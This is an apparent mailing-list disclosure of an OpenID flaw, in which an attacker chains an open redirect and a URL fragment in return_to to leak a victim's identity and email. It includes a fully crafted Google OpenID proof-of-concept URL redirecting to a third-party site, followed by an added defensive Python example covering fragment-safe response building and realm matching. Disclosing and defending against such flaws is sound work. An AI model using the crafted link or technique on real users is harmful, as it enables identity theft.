<div dir="ltr"><div>Hi Everyone,</div><div><br></div><div>Google's Security Team suggested asking this question here.</div><div><br></div><div>An attacker can perform the following steps:</div><div>1) Find an open redirect on some major website that leads to the attacker's website (and append a fragment identifier to this URL)</div>
<div>2) Craft a URL and set redirect_url to the open redirect</div><div>3) Trick the victim into visiting the URL</div><div>As the URL belongs to a major website, most likely the victim will accept the RP and his identity will be leaked to the attacker's site.</div>
<div><br></div><div>Here's an example (Google itself has some nice open redirects):</div><div><a href="https://www.google.com/accounts/o8/ud?openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.ext0=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.realm=https%3A%2F%2Fwww.google.com%2F&openid.return_to=https%3A%2F%2Fwww.google.com%2Fsearch%3FbtnI%26q%3Dallinurl%253A%252F%252Flva.lv%23aaa&openid.ui.icon=true&openid.ui.lang=en-US&openid.ui.mode=popup&third_party_login=false">https://www.google.com/accounts/o8/ud?openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.ext0=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.realm=https%3A%2F%2Fwww.google.com%2F&openid.return_to=https%3A%2F%2Fwww.google.com%2Fsearch%3FbtnI%26q%3Dallinurl%253A%252F%252Flva.lv%23aaa&openid.ui.icon=true&openid.ui.lang=en-US&openid.ui.mode=popup&third_party_login=false</a></div>
<div><br></div><div>This can even be extended so that the user doesn't have to accept the RP. For this, the attacker would have to find an open redirect that shares a domain with some valid OpenID consumer (some major sites actually do this). In this case the user wouldn't even notice the identity leak.</div>
<div><br></div><div>Is this only a bug in Google's OpenID implementation, or a bug in the OpenID spec itself?</div><div><br></div><div>I do see the OpenID spec talking about normalization of identifiers (including removal of the fragment and fragment identifier). Does the same apply to redirect_url? If not, would it be reasonable to include this in the spec?</div>
<div><br></div><div>Regards,</div><div>Andris Atteka</div><div><a href="http://andrisatteka.blogspot.com">andrisatteka.blogspot.com</a></div></div>
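<p>Added example (Python), not code from the original message, from Google, or from any OpenID library: it contrasts the careless way of appending a positive assertion to <code>return_to</code> that the fragment trick above relies on (the <code>openid.*</code> parameters land after <code>#</code>, so the browser keeps them client-side and the redirecting endpoint sees its original query string untouched) with a helper that merges the assertion into the query component and drops the fragment, and it adds the OpenID 2.0 return_to/realm matching check. The hosts <code>rp.example</code> and <code>op.example</code>, the sample URLs and the function names are constructed for illustration; the reading of the <code>*.</code> wildcard as "that host or any subdomain of it" is my own. Realm matching on its own does not help against an open redirect that lives inside the realm, which is exactly the point of the message; the fragment handling is what addresses the specific trick described.</p>

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Constructed sample values (not taken from the original message): a return_to
# whose query string is consumed by a redirecting endpoint, with a fragment
# appended, and a minimal positive assertion an OP would send back.
SAMPLE_RETURN_TO = "https://rp.example/search?btnI&q=allinurl%3A%2F%2Flva.lv#aaa"
SAMPLE_ASSERTION = {
    "openid.ns": "http://specs.openid.net/auth/2.0",
    "openid.mode": "id_res",
    "openid.claimed_id": "https://op.example/id/alice",
}


def naive_indirect_response(return_to, params):
    """Plain string concatenation, as a careless OP might build the redirect.
    When return_to carries a fragment, the assertion is appended after '#', so
    the browser keeps it client-side and the server still receives the
    original, unmodified query string."""
    sep = "&" if "?" in return_to else "?"
    return return_to + sep + urlencode(params)


def safe_indirect_response(return_to, params):
    """Hypothetical hardened helper: merge the assertion into the query
    component and drop any fragment, so every openid.* parameter reaches the
    server and nothing survives into a client-side fragment."""
    parts = urlsplit(return_to)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.extend(params.items())
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), ""))


def query_params(url):
    """Parameters the receiving server would actually see (fragment excluded)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def return_to_matches_realm(return_to, realm):
    """OpenID 2.0 return_to/realm matching: same scheme and port, host equal to
    the realm host (or, for a '*.' realm, that host or a subdomain of it), and
    the realm path equal to or a parent directory of the return_to path.
    A realm carrying a fragment is rejected outright."""
    rt, rl = urlsplit(return_to), urlsplit(realm)
    if rl.fragment or rt.scheme != rl.scheme or rt.port != rl.port:
        return False
    rt_host, rl_host = (rt.hostname or "").lower(), (rl.hostname or "").lower()
    if rl_host.startswith("*."):
        base = rl_host[2:]
        if rt_host != base and not rt_host.endswith("." + base):
            return False
    elif rt_host != rl_host:
        return False
    rl_path = rl.path or "/"
    prefix = rl_path if rl_path.endswith("/") else rl_path + "/"
    return rt.path == rl_path or rt.path.startswith(prefix)


if __name__ == "__main__":
    naive = naive_indirect_response(SAMPLE_RETURN_TO, SAMPLE_ASSERTION)
    safe = safe_indirect_response(SAMPLE_RETURN_TO, SAMPLE_ASSERTION)
    print("naive server-side params:", query_params(naive))
    print("naive fragment:", urlsplit(naive).fragment)
    print("safe  server-side params:", query_params(safe))
    print("realm check:", return_to_matches_realm(SAMPLE_RETURN_TO, "https://rp.example/"))
```

<p>With the naive builder the server never sees <code>openid.mode</code> at all, while the hardened builder delivers the whole assertion in the query string and leaves no fragment for a downstream redirect to carry off.</p>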